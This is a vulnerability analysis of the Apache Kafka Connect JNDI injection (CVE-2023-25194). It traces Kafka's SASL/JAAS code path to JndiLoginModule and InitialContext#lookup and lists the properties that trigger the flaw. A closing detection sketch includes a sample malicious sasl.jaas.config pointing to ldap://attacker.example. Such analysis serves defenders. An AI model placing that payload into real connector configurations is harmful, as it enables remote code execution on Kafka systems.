Analysis of the Apache Kafka Connect JNDI Injection Vulnerability (CVE-2023-25194)
Introduction
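Apache Kafka is a distributed stream-processing platform that reliably publishes and subscribes to streams of data in distributed systems. It serves as a central pipeline for real-time data streams and connects a wide range of systems and applications. Apache Kafka Connect contains a JNDI injection vulnerability: an attacker who can reach a Kafka Connect worker and can create or modify connectors can set the sasl.jaas.config property so that it uses com.sun.security.auth.module.JndiLoginModule, which leads to JNDI injection.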
Vulnerability Analysis
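The analysis starts at the KafkaProducer#KafkaProducer() constructor.
It delegates to an overloaded constructor,
which in turn calls another overload.
After four overloaded-constructor calls in total, execution reaches newSender().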
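Execution continues into ClientUtils#createChannelBuilder(). The security.protocol and sasl.mechanism values read here come from the configuration we pass in; if they are not set explicitly, a null-related exception is thrown.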
Next is ChannelBuilders#clientChannelBuilder(), which requires both contextType and clientSaslMechanism to be non-null.
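As a rough illustration of the two settings discussed above, the following sketch builds the client properties that steer execution into the SASL code path. The class name, the method name, and the localhost:9092 address are hypothetical; only the property keys and the SASL_PLAINTEXT and PLAIN values are real Kafka settings. The sketch only builds a Properties object and does not open a connection.

```java
import java.util.Properties;

public class SaslClientPropsSketch {
    // Hypothetical helper: returns client properties that select a SASL protocol.
    static Properties saslClientProps(String bootstrapServers) {
        Properties props = new Properties();
        props.setProperty("bootstrap.servers", bootstrapServers);
        // Selects the SASL branch in ChannelBuilders#create().
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        // Becomes clientSaslMechanism further down the call chain.
        props.setProperty("sasl.mechanism", "PLAIN");
        return props;
    }

    public static void main(String[] args) {
        Properties props = saslClientProps("localhost:9092"); // placeholder address
        System.out.println(props.getProperty("security.protocol"));
        System.out.println(props.getProperty("sasl.mechanism"));
    }
}
```

These properties would normally be passed to a KafkaProducer constructor, which is where the call chain described in this section begins.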
This in turn calls ChannelBuilders#create():
private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism, boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache, Time time, LogContext logContext, Supplier<ApiVersionsResponse> apiVersionSupplier) {
    Map<String, Object> configs = channelBuilderConfigs(config, listenerName);
    Object channelBuilder;
    switch (securityProtocol) {
        case SSL:
            requireNonNullMode(mode, securityProtocol);
            channelBuilder = new SslChannelBuilder(mode, listenerName, isInterBrokerListener, logContext);
            break;
        case SASL_SSL:
        case SASL_PLAINTEXT:
            requireNonNullMode(mode, securityProtocol);
            String sslClientAuthOverride = null;
            Object jaasContexts;
            if (mode != Mode.SERVER) {
                JaasContext jaasContext = contextType == Type.CLIENT ? JaasContext.loadClientContext(configs) : JaasContext.loadServerContext(listenerName, clientSaslMechanism, configs);
                jaasContexts = Collections.singletonMap(clientSaslMechanism, jaasContext);
            } else {
                List<String> enabledMechanisms = (List)configs.get("sasl.enabled.mechanisms");
                jaasContexts = new HashMap(enabledMechanisms.size());
                Iterator var18 = enabledMechanisms.iterator();
                String listenerClientAuth;
                while(var18.hasNext()) {
                    listenerClientAuth = (String)var18.next();
                    ((Map)jaasContexts).put(listenerClientAuth, JaasContext.loadServerContext(listenerName, listenerClientAuth, configs));
                }
                if (listenerName != null && securityProtocol == SecurityProtocol.SASL_SSL) {
                    String configuredClientAuth = (String)configs.get("ssl.client.auth");
                    listenerClientAuth = (String)config.originalsWithPrefix(listenerName.configPrefix(), true).get("ssl.client.auth");
                    if (listenerClientAuth == null) {
                        sslClientAuthOverride = SslClientAuth.NONE.name().toLowerCase(Locale.ROOT);
                        if (configuredClientAuth != null && !configuredClientAuth.equalsIgnoreCase(SslClientAuth.NONE.name())) {
                            log.warn("Broker configuration '{}' is applied only to SSL listeners. Listener-prefixed configuration can be used to enable SSL client authentication for SASL_SSL listeners. In future releases, broker-wide option without listener prefix may be applied to SASL_SSL listeners as well. All configuration options intended for specific listeners should be listener-prefixed.", "ssl.client.auth");
                        }
                    }
                }
            }
            channelBuilder = new SaslChannelBuilder(mode, (Map)jaasContexts, securityProtocol, listenerName, isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable, credentialCache, tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier);
            break;
        case PLAINTEXT:
            channelBuilder = new PlaintextChannelBuilder(listenerName);
            break;
        default:
            throw new IllegalArgumentException("Unexpected securityProtocol " + securityProtocol);
    }
    ((ChannelBuilder)channelBuilder).configure(configs);
    return (ChannelBuilder)channelBuilder;
}
When security.protocol is SSL, channelBuilder is an SslChannelBuilder.
When security.protocol is SASL_SSL or SASL_PLAINTEXT, channelBuilder is a SaslChannelBuilder.
When security.protocol is PLAINTEXT, channelBuilder is a PlaintextChannelBuilder.
For any other value, an IllegalArgumentException is thrown.
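The dispatch described above can be condensed into a small stand-alone sketch. It is a simplification for illustration, not Kafka's code: the Protocol enum and the builderFor method are hypothetical stand-ins, and the method returns the builder's class name as a string instead of constructing a real channel builder.

```java
public class ChannelBuilderDispatchSketch {
    // Hypothetical stand-in for Kafka's SecurityProtocol enum.
    enum Protocol { PLAINTEXT, SSL, SASL_PLAINTEXT, SASL_SSL }

    // Maps a security.protocol value to the name of the builder that create() would pick.
    static String builderFor(String securityProtocol) {
        Protocol protocol;
        try {
            protocol = Protocol.valueOf(securityProtocol);
        } catch (IllegalArgumentException e) {
            throw new IllegalArgumentException("Unexpected securityProtocol " + securityProtocol);
        }
        switch (protocol) {
            case SSL:
                return "SslChannelBuilder";
            case SASL_SSL:
            case SASL_PLAINTEXT:
                // Only this branch loads a JaasContext, so only it reaches the JAAS login path.
                return "SaslChannelBuilder";
            case PLAINTEXT:
                return "PlaintextChannelBuilder";
            default:
                throw new IllegalArgumentException("Unexpected securityProtocol " + securityProtocol);
        }
    }

    public static void main(String[] args) {
        System.out.println(builderFor("SASL_PLAINTEXT"));
    }
}
```

The point of the sketch is that only the two SASL values lead to the code that parses sasl.jaas.config, which is why the exploit conditions require one of them.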
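In the SASL branch, a JaasContext instance is built from the config, and a SaslChannelBuilder object is then created with it.
While the JaasContext is being instantiated, it calls new JaasConfig(globalContextName, dynamicJaasConfig.value());
This parses the sasl.jaas.config string into AppConfigurationEntry objects, which hold the loginModuleName along with the other options.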
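To make the parsing step concrete, here is a deliberately simplified sketch that turns a single-entry sasl.jaas.config string into a JDK AppConfigurationEntry. It is not Kafka's JaasConfig parser: the class, the regex, and the helper methods are assumptions made for illustration, and the sketch handles only one entry with plain key=value or key="value" options. The example input uses Kafka's PlainLoginModule class name purely as a string.

```java
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.security.auth.login.AppConfigurationEntry;
import javax.security.auth.login.AppConfigurationEntry.LoginModuleControlFlag;

public class JaasConfigSketch {
    // Matches key="quoted value" or key=bareValue.
    private static final Pattern OPTION = Pattern.compile("([\\w.]+)=(?:\"([^\"]*)\"|(\\S+))");

    // Simplified parser: "<loginModuleClass> <controlFlag> <options...>;"
    static AppConfigurationEntry parse(String jaasConfig) {
        String text = jaasConfig.trim();
        if (!text.endsWith(";")) {
            throw new IllegalArgumentException("JAAS config entry must end with ';'");
        }
        text = text.substring(0, text.length() - 1).trim();
        String[] parts = text.split("\\s+", 3);
        if (parts.length < 2) {
            throw new IllegalArgumentException("Expected login module name and control flag");
        }
        Map<String, String> options = new LinkedHashMap<>();
        if (parts.length == 3) {
            Matcher m = OPTION.matcher(parts[2]);
            while (m.find()) {
                options.put(m.group(1), m.group(2) != null ? m.group(2) : m.group(3));
            }
        }
        // The first token is stored verbatim as the class name that JAAS will load later.
        return new AppConfigurationEntry(parts[0], controlFlag(parts[1]), options);
    }

    private static LoginModuleControlFlag controlFlag(String flag) {
        switch (flag.toUpperCase(Locale.ROOT)) {
            case "REQUIRED": return LoginModuleControlFlag.REQUIRED;
            case "REQUISITE": return LoginModuleControlFlag.REQUISITE;
            case "SUFFICIENT": return LoginModuleControlFlag.SUFFICIENT;
            case "OPTIONAL": return LoginModuleControlFlag.OPTIONAL;
            default: throw new IllegalArgumentException("Invalid control flag: " + flag);
        }
    }

    public static void main(String[] args) {
        AppConfigurationEntry entry = parse(
            "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"alice\" password=\"secret\";");
        System.out.println(entry.getLoginModuleName() + " " + entry.getOptions().keySet());
    }
}
```

Nothing in this step validates the class name, so whatever module the configuration names is carried forward unchanged to the login stage.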
Follow into SaslChannelBuilder#configure(),
and from there into LoginManager#acquireLoginManager():
public static LoginManager acquireLoginManager(JaasContext jaasContext, String saslMechanism, Class<? extends Login> defaultLoginClass, Map<String, ?> configs) throws LoginException {
    Class<? extends Login> loginClass = configuredClassOrDefault(configs, jaasContext, saslMechanism, "sasl.login.class", defaultLoginClass);
    Class<? extends AuthenticateCallbackHandler> defaultLoginCallbackHandlerClass = "OAUTHBEARER".equals(saslMechanism) ? OAuthBearerUnsecuredLoginCallbackHandler.class : AbstractLogin.DefaultLoginCallbackHandler.class;
    Class<? extends AuthenticateCallbackHandler> loginCallbackClass = configuredClassOrDefault(configs, jaasContext, saslMechanism, "sasl.login.callback.handler.class", defaultLoginCallbackHandlerClass);
    Class var7 = LoginManager.class;
    synchronized(LoginManager.class) {
        Password jaasConfigValue = jaasContext.dynamicJaasConfig();
        LoginManager loginManager;
        LoginMetadata loginMetadata;
        if (jaasConfigValue != null) {
            loginMetadata = new LoginMetadata(jaasConfigValue, loginClass, loginCallbackClass);
            loginManager = (LoginManager)DYNAMIC_INSTANCES.get(loginMetadata);
            if (loginManager == null) {
                loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
                DYNAMIC_INSTANCES.put(loginMetadata, loginManager);
            }
        } else {
            loginMetadata = new LoginMetadata(jaasContext.name(), loginClass, loginCallbackClass);
            loginManager = (LoginManager)STATIC_INSTANCES.get(loginMetadata);
            if (loginManager == null) {
                loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
                STATIC_INSTANCES.put(loginMetadata, loginManager);
            }
        }
        SecurityUtils.addConfiguredSecurityProviders(configs);
        return loginManager.acquire();
    }
}
Follow into the LoginManager constructor.
It calls KerberosLogin#login(), which calls the parent implementation, AbstractLogin#login().
That method creates a new LoginContext and calls login() on it:
public LoginContext login() throws LoginException {
    this.loginContext = new LoginContext(this.contextName, (Subject)null, this.loginCallbackHandler, this.configuration);
    this.loginContext.login();
    log.info("Successfully logged in.");
    return this.loginContext;
}
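The following JDK-only sketch shows why the class name stored in the AppConfigurationEntry matters: LoginContext loads the named class, instantiates it, and calls its login() method. DemoLoginModule is a harmless hypothetical module written for this illustration, and the KafkaClient context name is only a label here because the in-memory Configuration ignores it.

```java
import java.util.Collections;
import java.util.Map;
import javax.security.auth.Subject;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.login.AppConfigurationEntry;
import javax.security.auth.login.AppConfigurationEntry.LoginModuleControlFlag;
import javax.security.auth.login.Configuration;
import javax.security.auth.login.LoginContext;
import javax.security.auth.login.LoginException;
import javax.security.auth.spi.LoginModule;

public class LoginContextSketch {
    static volatile boolean loginCalled = false;

    // Harmless demo module; it only records that login() was invoked.
    public static class DemoLoginModule implements LoginModule {
        public void initialize(Subject subject, CallbackHandler handler,
                               Map<String, ?> sharedState, Map<String, ?> options) { }
        public boolean login() { loginCalled = true; return true; }
        public boolean commit() { return true; }
        public boolean abort() { return true; }
        public boolean logout() { return true; }
    }

    // Runs a JAAS login whose only module is the class named by moduleClassName.
    static boolean runLogin(final String moduleClassName) {
        Configuration configuration = new Configuration() {
            @Override
            public AppConfigurationEntry[] getAppConfigurationEntry(String name) {
                return new AppConfigurationEntry[] {
                    new AppConfigurationEntry(moduleClassName, LoginModuleControlFlag.REQUIRED,
                        Collections.<String, Object>emptyMap())
                };
            }
        };
        try {
            // Same constructor shape as in AbstractLogin#login(): null Subject, explicit Configuration.
            LoginContext context = new LoginContext("KafkaClient", null, callbacks -> { }, configuration);
            context.login(); // the module class is loaded and instantiated by name here
        } catch (LoginException e) {
            throw new IllegalStateException(e);
        }
        return loginCalled;
    }

    public static void main(String[] args) {
        System.out.println(runLogin(DemoLoginModule.class.getName()));
    }
}
```

In the vulnerable flow the class name comes from sasl.jaas.config, so an attacker who controls that string decides which LoginModule on the classpath gets instantiated and run.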
After a series of calls, execution reaches LoginContext#invoke(), which obtains the com.sun.security.auth.module.JndiLoginModule class via reflection and then instantiates it.
Execution then enters JndiLoginModule#login(), where neither userProvider nor groupProvider may be null.
When useFirstPass=true or tryFirstPass=true, it goes on into attemptAuthentication();
There, InitialContext#lookup is called, which triggers the JNDI injection.
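Summary: JNDI injection becomes reachable when an attacker controls the properties that kafka-clients uses to connect, specifically when:
security.protocol is set to SASL_PLAINTEXT or SASL_SSL, and sasl.mechanism is specified;
sasl.jaas.config names com.sun.security.auth.module.JndiLoginModule as the login module;
userProvider and groupProvider are both non-null (JndiLoginModule fills them from the user.provider.url and group.provider.url options);
useFirstPass=true or tryFirstPass=true is set.
When the Kafka client then initiates a connection, it performs a JNDI lookup, which results in JNDI injection.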
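The conditions in the summary can be written as a simple predicate, for example to screen connector configurations before they are accepted. This is a minimal string-matching sketch under stated assumptions, not Kafka's own validation logic: the class and method names are hypothetical, and the check looks for the user.provider.url and group.provider.url option keys from which JndiLoginModule populates userProvider and groupProvider. The attacker.example host is a placeholder.

```java
import java.util.HashMap;
import java.util.Map;

public class JndiConfigCheck {
    static final String JNDI_MODULE = "com.sun.security.auth.module.JndiLoginModule";

    // Returns true when the properties match every condition listed in the summary.
    static boolean matchesSummaryConditions(Map<String, String> props) {
        String protocol = props.getOrDefault("security.protocol", "");
        String mechanism = props.get("sasl.mechanism");
        String jaas = props.getOrDefault("sasl.jaas.config", "").trim();

        boolean saslProtocol = protocol.equals("SASL_PLAINTEXT") || protocol.equals("SASL_SSL");
        boolean jndiModule = jaas.startsWith(JNDI_MODULE);
        boolean providersSet = jaas.contains("user.provider.url=") && jaas.contains("group.provider.url=");
        boolean firstPass = jaas.matches("(?s).*\\b(useFirstPass|tryFirstPass)=\"?true\"?.*");

        return saslProtocol && mechanism != null && jndiModule && providersSet && firstPass;
    }

    public static void main(String[] args) {
        Map<String, String> props = new HashMap<>();
        props.put("security.protocol", "SASL_PLAINTEXT");
        props.put("sasl.mechanism", "PLAIN");
        // Placeholder URLs; attacker.example is not a real endpoint.
        props.put("sasl.jaas.config", JNDI_MODULE
            + " required user.provider.url=\"ldap://attacker.example/x\""
            + " group.provider.url=\"x\" useFirstPass=\"true\";");
        System.out.println(matchesSummaryConditions(props));
    }
}
```

A string match like this is easy to evade with unusual whitespace or quoting, so it is better read as a restatement of the exploit preconditions than as a complete defense.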